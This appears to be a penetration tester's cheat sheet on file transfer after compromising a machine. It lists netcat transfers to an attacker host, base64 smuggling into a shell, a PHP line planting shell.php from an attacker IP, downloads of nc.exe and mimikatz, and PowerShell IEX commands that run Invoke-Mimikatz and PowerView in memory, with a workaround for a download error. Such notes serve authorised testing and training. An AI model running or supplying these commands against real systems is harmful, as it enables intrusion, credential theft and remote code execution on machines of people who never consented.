Transferring files
First step after gaining access to a remote machine is to upload new tools.
on target run:
nc -lvp 443> transfer.txt
on attacker run:
nc $ip 443 < transfer.txt
or
on attacker run:
nc -lvp 443> transfer.txt
on target run:
cat transfer.txt | nc $attackerip 443
The attack box can now connect to port 443 and download a file called transfer.txt
If u ever happen to have a shell of a UNIX system, and cannot find a way to upload anything, this is a lifesaver trick you can try:
On local system:
cat filetoupload | base64 -w 0; echo
#double click on output to copy
On Target System:
echo <copiedContent> | base64 -d > filetoupload
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh Download a file using Wget
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh Download a file using cURL
php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);' Download a file using PHP
scp C:\Temp\bloodhound.zip [email protected]10.10.10.150:/tmp/bloodhound.zip Upload a file using SCP
scp [email protected]:/tmp/mimikatz.exe C:\Temp\mimikatz.exe Download a file using SCP
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
nano /etc/default/atftpd # confirm that /tftp is the directory - otherwise it cant find the file
service atftpd restart
python -m SimpleHTTPServer
python3 -m http.server
php -S $ip:80
nc -nlvp 4444 > incoming.exe
use auxiliary/server/ftp
auxiliary/server/tftp
pip install pyftpdlib
python -m pyftpdlib -p 21
python smbserver.py WORKSPACE /dir
smbserver.py devel /root/Desktop/htb/devel
curl -T 'file' 'http://$ip'
smbclient -L 1.1.1.1 --no-pass
wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py

Simple HTTP Server with Upload
<?php file_put_contents("/var/tmp/shell.php", file_get_contents("http://10.11.0.245/shell.php")); ?>
python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')"
In most environments,
HTTP
/HTTPS
traffic is allowed out of the firewall in some form - and if we have a GUI session, a web browser could also be used. However, from a Windows shell, PowerShell
offers many file transfer options. In any version of PowerShell
, the System.Net.WebClient class can be used to download a file over HTTP
.PS C:\htb> (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1',"C:\Users\Public\Downloads\PowerView.ps1")
From PowerShell 3.0, Invoke-WebRequest is also available, but it is noticeably slower at downloading files. The aliases
iwr
, curl
, and wget
can be used instead of Invoke-WebRequest.https://lolbas-project.github.io/#/download
PS C:\htb> Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
Instead of downloading to disk, the payload can instead be executed in memory, using Invoke-Expression, or the alias
iex
.PS C:\htb> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
IEX also accepts pipeline input.
PS C:\htb> Invoke-WebRequest https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1 | iex
There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

image

image
This can be bypassed using the parameter
-UseBasicParsing
.PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 | iex
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
PS C:\htb> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex
PS C:\htb> Invoke-CheckLocalAdminAccess